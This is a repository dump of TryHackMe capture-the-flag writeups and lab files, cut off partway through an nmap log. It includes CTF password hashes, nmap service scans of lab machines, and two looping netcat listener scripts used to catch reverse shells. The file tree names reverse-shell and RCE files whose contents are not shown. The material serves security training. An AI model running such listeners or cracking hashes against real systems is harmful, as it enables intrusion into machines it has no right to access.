├── readme.md ├── room_2019_advent_of_cyber ├── day03 │ ├── Evil Elf.pcap │ └── buddy_hash.txt ├── day05 │ ├── reverse_image_search.jpg │ └── thegrinch.jpg ├── day06 │ ├── TryHackMe.jpg │ ├── christmaslistdan.tx │ ├── christmaslistdark.txt │ ├── christmaslists.zip │ ├── christmaslistskidyandashu.txt │ ├── christmaslisttimmy.txt │ ├── christmasmonster.txt │ └── holidaythief.pcap ├── day12 │ └── tosend.zip ├── day15 │ └── charlie.txt ├── day16 │ ├── day16_file_confusion.py │ └── final-final-compressed.zip ├── day18 │ └── nc_script.sh ├── day21 │ ├── challenge1 │ ├── file1 │ └── files.zip ├── day22 │ ├── if1 │ ├── if1.c │ ├── if2 │ ├── if2.c │ └── re-challenge-2.zip ├── day23 │ └── nc_script.sh ├── day9_requests.py ├── nmap_scan_results │ ├── day10_metaploit.log │ ├── day11_elf_apps.log │ ├── day11_nfs_shares.log │ ├── day13_accumulate.log │ ├── day15_lfi.log │ ├── day20_cronjob.log │ ├── day24_elf_stalk.log │ ├── day7_skillingup.log │ └── day8_suid.log └── screenshots │ ├── day01 │ ├── authid.png │ └── mcinventory.png │ ├── day02 │ ├── BYOE.png │ ├── credentials.png │ ├── gobuster.png │ └── source.png │ ├── day03 │ ├── packet_998.png │ ├── shadow.png │ └── telnet.png │ ├── day05 │ ├── ada.png │ ├── metadata.png │ ├── twitter.png │ ├── wayback.png │ └── woman.png │ ├── day06 │ ├── christmas_lists.png │ ├── cyberchef.png │ ├── dns.png │ ├── fcrackzip.png │ ├── password.png │ ├── steghide.png │ └── zip.png │ ├── day07 │ └── file.png │ ├── day08 │ ├── find.png │ └── su.png │ ├── day10 │ ├── options.png │ ├── reverse_shell.png │ └── struts2.png │ ├── day11 │ ├── db.png │ ├── file.png │ ├── mysql.png │ ├── tables.png │ └── users.png │ ├── day13 │ ├── creds.png │ ├── gobuster.png │ └── retro.png │ ├── day14 │ ├── bucket.png │ └── file.png │ ├── day15 │ ├── burpsuite.png │ ├── notes.png │ ├── password.png │ ├── script.png │ └── shadow.png │ ├── day18 │ ├── message.png │ └── nc.png │ ├── day19 │ ├── cmd.png │ ├── cookie.png │ ├── find.png │ ├── flag.png │ └── ls.png │ ├── day20 │ ├── home.png │ └── scripts.png │ ├── day21 │ └── r2_main.png │ ├── day22 │ └── r2_if.png │ ├── day23 │ ├── dbs.png │ ├── flag.png │ ├── messages.png │ ├── tables.png │ └── users.png │ └── day24 │ ├── kibana.png │ ├── log.png │ └── password.png ├── room_basic_pentest ├── forjohn.txt ├── kay_id_rsa ├── results.log └── screenshots │ ├── enum4linux.png │ ├── gobuster.png │ ├── hydra.png │ └── john.png ├── room_c4ptur3_th3_fl4g ├── meme.jpg ├── screenshots │ ├── audacity.png │ ├── steghide.png │ └── strings.png ├── secretaudio.wav ├── steganopayload2248.txt └── stegosteg.jpg ├── room_cc_pen_testing ├── ctf │ ├── gobuster_scan.log │ ├── nmap_scan.log │ └── nyan.txt ├── john2.txt ├── john_1.txt ├── screenshots │ ├── becoming_root.png │ ├── dir.png │ ├── nice.png │ ├── secret.png │ ├── secret_dir.png │ ├── secret_secret.png │ ├── sqlmap_dump_1.png │ ├── sqlmap_dump_2.png │ └── xxa.png └── service_scan.log ├── room_crack_the_hash ├── hash1_1.txt ├── hash1_2.txt ├── hash1_3.txt ├── hash1_4.txt ├── hash1_5.txt ├── hash2_1.txt ├── hash2_2.txt ├── hash2_3.txt └── hash2_4.txt ├── room_hydra └── screenshots │ └── molly_ssh.png ├── room_kenobi ├── curl.png ├── dv.gif ├── id_rsa ├── log.txt ├── nmap_scans │ ├── nfs_scan.log │ ├── scan_results.log │ └── smb_scan.log ├── perm.png ├── perms.png ├── ports.png ├── proftpd.png ├── samba.png └── screenshots │ ├── find.png │ ├── flag.png │ ├── menu.png │ ├── mount.png │ ├── nc.png │ ├── pe.png │ ├── searchsploit.png │ ├── site.png │ ├── smbclient.png │ └── ssh.png ├── room_learn_rust ├── Rustroom.pdf ├── cuddlyferris.svg ├── graph.png ├── rust_hello_world │ ├── Cargo.lock │ ├── Cargo.toml │ ├── src │ │ └── main.rs │ └── target │ │ ├── .rustc_info.json │ │ ├── debug │ │ ├── .cargo-lock │ │ ├── .fingerprint │ │ │ └── rust_hello_world-e3d361aee0384edd │ │ │ │ ├── bin-rust_hello_world │ │ │ │ ├── bin-rust_hello_world.json │ │ │ │ ├── dep-bin-rust_hello_world │ │ │ │ └── invoked.timestamp │ │ ├── deps │ │ │ ├── rust_hello_world-e3d361aee0384edd │ │ │ └── rust_hello_world-e3d361aee0384edd.d │ │ ├── incremental │ │ │ └── rust_hello_world-2v5lnyrx9havg │ │ │ │ ├── s-fspr485mm7-sa1wn6-1eibreni65c4 │ │ │ │ ├── 151b8ef6dd1o76fx.o │ │ │ │ ├── 1jylltu0axep80ge.o │ │ │ │ ├── 2fq7qque6ou4zp7w.o │ │ │ │ ├── 34cf6ady3zn7h0br.o │ │ │ │ ├── 3fsfalg3pkx1ipe8.o │ │ │ │ ├── 3p4154ndxk0t4kza.o │ │ │ │ ├── 3tnkrrfl0jsn7gy.o │ │ │ │ ├── 7gfe426jo8pe1y3.o │ │ │ │ ├── dep-graph.bin │ │ │ │ ├── query-cache.bin │ │ │ │ └── work-products.bin │ │ │ │ └── s-fspr485mm7-sa1wn6.lock │ │ ├── rust_hello_world │ │ └── rust_hello_world.d │ │ └── rls │ │ ├── .rustc_info.json │ │ ├── CACHEDIR.TAG │ │ └── debug │ │ ├── .cargo-lock │ │ ├── .fingerprint │ │ ├── rust_hello_world-6b80a374f8adeb4c │ │ │ ├── dep-test-bin-rust_hello_world │ │ │ ├── invoked.timestamp │ │ │ ├── test-bin-rust_hello_world │ │ │ └── test-bin-rust_hello_world.json │ │ └── rust_hello_world-979be69e884e7653 │ │ │ ├── bin-rust_hello_world │ │ │ ├── bin-rust_hello_world.json │ │ │ ├── dep-bin-rust_hello_world │ │ │ └── invoked.timestamp │ │ ├── deps │ │ ├── librust_hello_world-6b80a374f8adeb4c.rmeta │ │ ├── librust_hello_world-979be69e884e7653.rmeta │ │ ├── rust_hello_world-6b80a374f8adeb4c.d │ │ ├── rust_hello_world-979be69e884e7653.d │ │ └── save-analysis │ │ │ ├── rust_hello_world-6b80a374f8adeb4c.json │ │ │ └── rust_hello_world-979be69e884e7653.json │ │ └── incremental │ │ ├── rust_hello_world-17vicrtislj8g │ │ ├── s-fspr2zw78u-1sirg0z-19bedwzhfs7wl │ │ │ ├── dep-graph.bin │ │ │ ├── query-cache.bin │ │ │ └── work-products.bin │ │ └── s-fspr2zw78u-1sirg0z.lock │ │ └── rust_hello_world-2vpeabgnekkug │ │ ├── s-fspr2zy3hq-1dca8lx-3u55tx7hlx4th │ │ ├── dep-graph.bin │ │ ├── query-cache.bin │ │ └── work-products.bin │ │ └── s-fspr2zy3hq-1dca8lx.lock ├── rust_task_4_question_1 │ ├── Cargo.lock │ ├── Cargo.toml │ ├── src │ │ └── main.rs │ └── target │ │ ├── .rustc_info.json │ │ ├── debug │ │ ├── .cargo-lock │ │ ├── .fingerprint │ │ │ └── rust_task_4_question_1-3efc02927c418b19 │ │ │ │ ├── invoked.timestamp │ │ │ │ └── output-bin-rust_task_4_question_1 │ │ ├── deps │ │ │ └── rust_task_4_question_1-3efc02927c418b19.d │ │ └── incremental │ │ │ └── rust_task_4_question_1-z52mlhbyfh5c │ │ │ └── s-fspso4i3ny-1kyr4xk.lock │ │ └── rls │ │ ├── .rustc_info.json │ │ ├── CACHEDIR.TAG │ │ └── debug │ │ ├── .cargo-lock │ │ ├── .fingerprint │ │ ├── rust_task_4_question_1-4fafdb15f7b8372a │ │ │ ├── dep-test-bin-rust_task_4_question_1 │ │ │ ├── invoked.timestamp │ │ │ ├── test-bin-rust_task_4_question_1 │ │ │ └── test-bin-rust_task_4_question_1.json │ │ └── rust_task_4_question_1-62f166f2afadf485 │ │ │ ├── bin-rust_task_4_question_1 │ │ │ ├── bin-rust_task_4_question_1.json │ │ │ ├── dep-bin-rust_task_4_question_1 │ │ │ └── invoked.timestamp │ │ ├── deps │ │ ├── librust_task_4_question_1-4fafdb15f7b8372a.rmeta │ │ ├── librust_task_4_question_1-62f166f2afadf485.rmeta │ │ ├── rust_task_4_question_1-4fafdb15f7b8372a.d │ │ ├── rust_task_4_question_1-62f166f2afadf485.d │ │ └── save-analysis │ │ │ ├── rust_task_4_question_1-4fafdb15f7b8372a.json │ │ │ └── rust_task_4_question_1-62f166f2afadf485.json │ │ └── incremental │ │ ├── rust_task_4_question_1-3o4k4wj4hqxck │ │ ├── s-fsprhycz1v-lgicwf-1cnlbur24auhj │ │ │ ├── dep-graph.bin │ │ │ ├── query-cache.bin │ │ │ └── work-products.bin │ │ ├── s-fsprhycz1v-lgicwf.lock │ │ ├── s-fspsmrz9ss-1w0426u-working │ │ │ ├── dep-graph.bin │ │ │ ├── query-cache.bin │ │ │ └── work-products.bin │ │ └── s-fspsmrz9ss-1w0426u.lock │ │ └── rust_task_4_question_1-phub2y83ca2l │ │ ├── s-fsprhyafrf-dls0k7-2nhyc15yhnem5 │ │ ├── dep-graph.bin │ │ ├── query-cache.bin │ │ └── work-products.bin │ │ ├── s-fsprhyafrf-dls0k7.lock │ │ ├── s-fspsogk8k0-ir08ii-working │ │ ├── dep-graph.bin │ │ ├── query-cache.bin │ │ └── work-products.bin │ │ └── s-fspsogk8k0-ir08ii.lock ├── rust_task_4_question_2 │ ├── Cargo.lock │ ├── Cargo.toml │ ├── src │ │ └── main.rs │ └── target │ │ ├── .rustc_info.json │ │ ├── debug │ │ ├── .cargo-lock │ │ ├── .fingerprint │ │ │ └── rust_task_4_question_2-3385faec9c38c8e2 │ │ │ │ ├── invoked.timestamp │ │ │ │ └── output-bin-rust_task_4_question_2 │ │ ├── deps │ │ │ └── rust_task_4_question_2-3385faec9c38c8e2.d │ │ └── incremental │ │ │ └── rust_task_4_question_2-34kvhl2z8977x │ │ │ └── s-fspszd52y7-u18go5.lock │ │ └── rls │ │ ├── .rustc_info.json │ │ ├── CACHEDIR.TAG │ │ └── debug │ │ ├── .cargo-lock │ │ ├── .fingerprint │ │ ├── rust_task_4_question_2-0d4288f9d45e126f │ │ │ ├── dep-test-bin-rust_task_4_question_2 │ │ │ ├── invoked.timestamp │ │ │ ├── test-bin-rust_task_4_question_2 │ │ │ └── test-bin-rust_task_4_question_2.json │ │ └── rust_task_4_question_2-9d9b49e5ccecbdc4 │ │ │ ├── bin-rust_task_4_question_2 │ │ │ ├── bin-rust_task_4_question_2.json │ │ │ ├── dep-bin-rust_task_4_question_2 │ │ │ └── invoked.timestamp │ │ ├── deps │ │ ├── rust_task_4_question_2-0d4288f9d45e126f.d │ │ ├── rust_task_4_question_2-9d9b49e5ccecbdc4.d │ │ └── save-analysis │ │ │ ├── rust_task_4_question_2-0d4288f9d45e126f.json │ │ │ └── rust_task_4_question_2-9d9b49e5ccecbdc4.json │ │ └── incremental │ │ ├── rust_task_4_question_2-1x6ssy8b5ff00 │ │ ├── s-fspsshbgln-wq29rp.lock │ │ ├── s-fspssk2r9p-977eqz.lock │ │ ├── s-fspssl0t1w-1n2huy6.lock │ │ ├── s-fspsslgezi-4x295y.lock │ │ ├── s-fspssluejc-azjd05.lock │ │ ├── s-fspssm5x65-1todw12.lock │ │ └── s-fspssmhumr-4r6mn2.lock │ │ └── rust_task_4_question_2-3cls89rd51up5 │ │ ├── s-fspssj956t-1wjcqvm.lock │ │ ├── s-fspssk4c3n-ixidc3.lock │ │ ├── s-fspsskbe5i-g4ztti.lock │ │ ├── s-fspsslethn-pau2rl.lock │ │ ├── s-fspsslp6my-1gqs261.lock │ │ ├── s-fspssm4ryt-1ukv4xe.lock │ │ └── s-fspssmg6f8-bi227v.lock ├── screenshots │ ├── 41.png │ └── 42.png ├── speed_meter.jpeg └── tablet.png ├── room_metasploit └── screenshots │ ├── autoroute.png │ ├── checkvm.png │ ├── exploit_suggester.png │ ├── getuid.png │ ├── kiwi.png │ ├── metasploit_modules.png │ ├── prev2_1.png │ ├── prev2_2.png │ ├── privs.png │ ├── ps1.png │ ├── ps2.png │ ├── rhosts.png │ ├── scan.png │ ├── services.png │ ├── sessions.png │ └── sysinfo.png ├── room_nmap_scan_results ├── aggressive_scan.log ├── service_version_detection.log ├── syn_scan.log └── vuln_scan.log ├── room_ohsint ├── WindowsXP.jpg └── screenshots │ ├── blog.png │ ├── exiftool.png │ ├── github.png │ ├── twitter.png │ └── wigle.png ├── room_owasp ├── day03 │ └── webapp.db ├── day08 │ └── rce.py ├── day09 │ └── rce.py ├── day10 │ └── login-logs.txt └── screenshots │ ├── day01 │ ├── home.png │ ├── ls.png │ ├── motd_1.png │ ├── motd_2.png │ ├── release.png │ ├── shell.png │ └── whoami.png │ ├── day02 │ ├── darren.png │ └── flag.png │ ├── day03 │ ├── assets.png │ ├── commands.png │ └── flag.png │ ├── day04 │ ├── name.png │ ├── ssh.png │ ├── xxe_1.png │ └── xxe_2.png │ ├── day05 │ ├── flag.png │ ├── logged.png │ └── login.png │ ├── day06 │ ├── flag.png │ ├── github.png │ └── notes.png │ ├── day07 │ ├── reflective11.png │ ├── reflective12.png │ ├── reflective13.png │ ├── reflective21.png │ ├── reflective22.png │ ├── reflective23.png │ ├── stored11.png │ ├── stored12.png │ ├── stored21.png │ ├── stored22.png │ ├── stored23.png │ ├── stored31.png │ ├── stored32.png │ └── stored33.png │ ├── day08 │ ├── cookie1.png │ ├── cookie2.png │ ├── cyberchef.png │ └── flag.png │ ├── day09 │ ├── exploit-db.png │ ├── index.png │ └── shell.png │ └── owasp.png ├── room_vulnversity ├── file.txt ├── php-reverse-shell.phtml ├── phpext.txt ├── screenshots │ ├── burpsuite.png │ ├── flag.png │ ├── gobuster.png │ ├── gtfobins.png │ ├── ls_cmd.png │ ├── netcat.png │ ├── peass.png │ ├── peass1.png │ ├── reverse_shell.png │ ├── suid.jpg │ ├── upload_form.png │ └── wordlist.png └── vulnversity_scan_results.log ├── room_web_fundamentals ├── requests.png └── screenshots │ ├── get.png │ ├── get_cookie.png │ ├── post.png │ ├── server.png │ └── set_cookie.png └── writeups ├── 2019AdventOfCyber.md ├── BasicPentesting.md ├── CCPenTesting.md ├── CrackTheHash.md ├── Hydra.md ├── Kenobi.md ├── LearnRust.md ├── Metasploit.md ├── Nmap.md ├── OWASP.md ├── OhSINT.md ├── Vulnversity.md ├── WebFundamentals.md └── c4ptur3th3fl4g.md /readme.md: -------------------------------------------------------------------------------- 1 | # TryHackMe Walkthroughs and Writeups 2 | This repository contains just some of the things I've learned using [TryHackMe](https://tryhackme.com/) 3 | 4 | So far, it contains the writeups for the following rooms: 5 | - [Crack the hash](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/CrackTheHash.md) 6 | - [c4ptur3-th3-fl4g](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/c4ptur3th3fl4g.md) 7 | - [Nmap](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/Nmap.md) 8 | - [OhSINT](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/OhSINT.md) 9 | - [Basic Pentesting](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/BasicPentesting.md) 10 | - [Vulnversity](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/Vulnversity.md) 11 | - [Kenobi](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/Kenobi.md) 12 | - [Metasploit](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/Metasploit.md) 13 | - [Advent of Cyber](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/2019AdventOfCyber.md) 14 | - [CC: Pen Testing](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/CCPenTesting.md) 15 | - [Hydra](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/Hydra.md) 16 | - [Web Fundamentals](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/WebFundamentals.md) 17 | - [OWASP Top 10](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/OWASP.md) 18 | - [Learn Rust](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/writeups/LearnRust.md) [WIP] 19 | 20 | Coming up: 21 | - Mr Robot CTF 22 | - Pickle Rick 23 | - Blue 24 | - Nessus 25 | - Intro to x86-64 26 | - c4ptur3-th3-fl4g 27 | - tmux 28 | - Introductory Networking 29 | - Simple CTF 30 | - The Cod Caper 31 | - Bounty Hacker 32 | - Agent Sudo 33 | - The find command 34 | 35 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day03/Evil Elf.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day03/Evil Elf.pcap -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day03/buddy_hash.txt: -------------------------------------------------------------------------------- 1 | $6$3GvJsNPG$ZrSFprHS13divBhlaKg1rYrYLJ7m1xsYRKxlLh0A1sUc/6SUd7UvekBOtSnSyBwk3vCDqBhrgxQpkdsNN6aYP1 2 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day05/reverse_image_search.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day05/reverse_image_search.jpg -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day05/thegrinch.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day05/thegrinch.jpg -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day06/TryHackMe.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day06/TryHackMe.jpg -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day06/christmaslistdan.tx: -------------------------------------------------------------------------------- 1 | Dear Santa, 2 | For Christmas I would like a Razer Quartz Mouse! 3 | Thank you, 4 | Dan <3 5 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day06/christmaslistdark.txt: -------------------------------------------------------------------------------- 1 | Dear Santa, 2 | For Christmas I would like to be a TryHackMe Subscriber! 3 | Thanks, 4 | Dark 5 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day06/christmaslists.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day06/christmaslists.zip -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day06/christmaslistskidyandashu.txt: -------------------------------------------------------------------------------- 1 | Dear Santa, 2 | For Christmas we would like everyone to have fun in the 25 Days of Christmas CTF 3 | Thanks, 4 | Skidy and Ashu 5 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day06/christmaslisttimmy.txt: -------------------------------------------------------------------------------- 1 | Dear Santa, 2 | For Christmas I would like to be a PenTester! Not the Bic kind! 3 | Thank you, 4 | Little Timmy. 5 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day06/christmasmonster.txt: -------------------------------------------------------------------------------- 1 | ARPAWOCKY 2 | RFC527 3 | 4 | Twas brillig, and the Protocols 5 | Did USER-SERVER in the wabe. 6 | All mimsey was the FTP, 7 | And the RJE outgrabe, 8 | 9 | Beware the ARPANET, my son; 10 | The bits that byte, the heads that scratch; 11 | Beware the NCP, and shun 12 | the frumious system patch, 13 | 14 | He took his coding pad in hand; 15 | Long time the Echo-plex he sought. 16 | When his HOST-to-IMP began to limp 17 | he stood a while in thought, 18 | 19 | And while he stood, in uffish thought, 20 | The ARPANET, with IMPish bent, 21 | Sent packets through conditioned lines, 22 | And checked them as they went, 23 | 24 | One-two, one-two, and through and through 25 | The IMP-to-IMP went ACK and NACK, 26 | When the RFNM came, he said "I'm game", 27 | And sent the answer back, 28 | 29 | Then hast thou joined the ARPANET? 30 | Oh come to me, my bankrupt boy! 31 | Quick, call the NIC! Send RFCs! 32 | He chortled in his joy. 33 | 34 | Twas brillig, and the Protocols 35 | Did USER-SERVER in the wabe. 36 | All mimsey was the FTP, 37 | And the RJE outgrabe. 38 | 39 | D.L. COVILL 40 | May 1973 41 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day06/holidaythief.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day06/holidaythief.pcap -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day12/tosend.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day12/tosend.zip -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day15/charlie.txt: -------------------------------------------------------------------------------- 1 | $6$oHymLspP$wTqsTmpPkz.u/CQDbheQjwwjyYoVN2rOm6CDu0KDeq8mN4pqzuna7OX.LPdDPCkPj7O9TB0rvWfCzpEkGOyhL. 2 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day16/day16_file_confusion.py: -------------------------------------------------------------------------------- 1 | import exiftool 2 | import os 3 | import zipfile 4 | 5 | def version(f, v): 6 | with exiftool.ExifTool() as et: 7 | metadata = et.get_metadata(f) 8 | try: 9 | if metadata['XMP:Version'] == 1.1: 10 | print(f) 11 | except: 12 | pass 13 | 14 | def check_password(f): 15 | try: 16 | with open(f, 'r') as reader: 17 | data = reader.read() 18 | if 'password' in data: 19 | print('Password is in: ' + f) 20 | except: 21 | pass 22 | 23 | file_number = 0 24 | with zipfile.ZipFile('final-final-compressed.zip', 'r') as zip_ref: 25 | zip_ref.extractall('final-final-uncompressed') 26 | 27 | os.chdir('final-final-uncompressed') 28 | for subdir, dirs, zips in os.walk('./'): 29 | for z in zips: 30 | with zipfile.ZipFile(z, 'r') as zi: 31 | zi.extractall(z[:-4]) 32 | os.chdir(z[:-4]) 33 | 34 | for subdir, dirs, files in os.walk('./'): 35 | for f in files: 36 | file_number += 1 37 | check_password(f) 38 | version(f, 1.1) 39 | 40 | 41 | os.chdir('../') 42 | 43 | print("Number of files: " + str(file_number)) 44 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day16/final-final-compressed.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day16/final-final-compressed.zip -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day18/nc_script.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | while [ true ]; 3 | do 4 | nc -lvnp 727 5 | done 6 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day21/challenge1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day21/challenge1 -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day21/file1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day21/file1 -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day21/files.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day21/files.zip -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day22/if1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day22/if1 -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day22/if1.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void){ 4 | int a = 3; 5 | int b = 4; 6 | if(a < b){ 7 | a += 5; 8 | } 9 | else{ 10 | b += 3; 11 | } 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day22/if2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day22/if2 -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day22/if2.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void) { 4 | int a = 8; 5 | int b = 2; 6 | if (a <= b) { 7 | b += 7; 8 | } 9 | else { 10 | a += 1; 11 | } 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day22/re-challenge-2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_2019_advent_of_cyber/day22/re-challenge-2.zip -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day23/nc_script.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | while [ true ]; 3 | do 4 | nc -lvnp 727 5 | done 6 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/day9_requests.py: -------------------------------------------------------------------------------- 1 | import json 2 | import urllib3 3 | 4 | http = urllib3.PoolManager() 5 | url = 'http://10.10.169.100:3000' 6 | req = http.request('GET', url) 7 | res = json.loads(req.data.decode('utf-8')) 8 | flag = "" 9 | while res['next'] != 'end': 10 | req = http.request('GET', url + '/' + res['next']) 11 | res = json.loads(req.data.decode('utf-8')) 12 | print(res) 13 | if res['value'] != 'end': 14 | flag += res['value'] 15 | 16 | print("flag: " + flag) 17 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/nmap_scan_results/day10_metaploit.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Wed Sep 16 17:22:39 2020 as: nmap -sV -oN day10_metaploit.log 10.10.118.185 2 | Nmap scan report for 10.10.118.185 3 | Host is up (0.22s latency). 4 | Not shown: 997 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 7 | 80/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8 | 111/tcp open rpcbind 2-4 (RPC #100000) 9 | 10 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 11 | # Nmap done at Wed Sep 16 17:23:03 2020 -- 1 IP address (1 host up) scanned in 23.77 seconds 12 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/nmap_scan_results/day11_elf_apps.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Thu Sep 17 13:10:44 2020 as: nmap -sV -oN day11_elf_apps.log 10.10.128.198 2 | Nmap scan report for 10.10.128.198 3 | Host is up (0.22s latency). 4 | Not shown: 995 closed ports 5 | PORT STATE SERVICE VERSION 6 | 21/tcp open ftp vsftpd 3.0.2 7 | 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 8 | 111/tcp open rpcbind 2-4 (RPC #100000) 9 | 2049/tcp open nfs_acl 3 (RPC #100227) 10 | 3306/tcp open mysql MySQL 5.7.28 11 | Service Info: OS: Unix 12 | 13 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 14 | # Nmap done at Thu Sep 17 13:11:13 2020 -- 1 IP address (1 host up) scanned in 28.72 seconds 15 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/nmap_scan_results/day11_nfs_shares.log: -------------------------------------------------------------------------------- 1 | Export list for 10.10.128.198: 2 | /opt/files * 3 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/nmap_scan_results/day13_accumulate.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sat Sep 19 14:10:51 2020 as: nmap -Pn -sV -oN day13_accumulate.log 10.10.24.100 2 | Nmap scan report for 10.10.24.100 3 | Host is up (0.24s latency). 4 | Not shown: 998 filtered ports 5 | PORT STATE SERVICE VERSION 6 | 80/tcp open http Microsoft IIS httpd 10.0 7 | 3389/tcp open ms-wbt-server Microsoft Terminal Services 8 | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 9 | 10 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 11 | # Nmap done at Sat Sep 19 14:11:16 2020 -- 1 IP address (1 host up) scanned in 25.25 seconds 12 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/nmap_scan_results/day15_lfi.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Tue Sep 22 13:12:24 2020 as: nmap -sV -oN day15_lfi.log 10.10.176.115 2 | Nmap scan report for 10.10.176.115 3 | Host is up (0.22s latency). 4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 7 | 80/tcp open http Node.js (Express middleware) 8 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 9 | 10 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 11 | # Nmap done at Tue Sep 22 13:12:55 2020 -- 1 IP address (1 host up) scanned in 32.09 seconds 12 | -------------------------------------------------------------------------------- /room_2019_advent_of_cyber/nmap_scan_results/day20_cronjob.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Mon Sep 28 13:43:23 2020 as: nmap -sV -oN 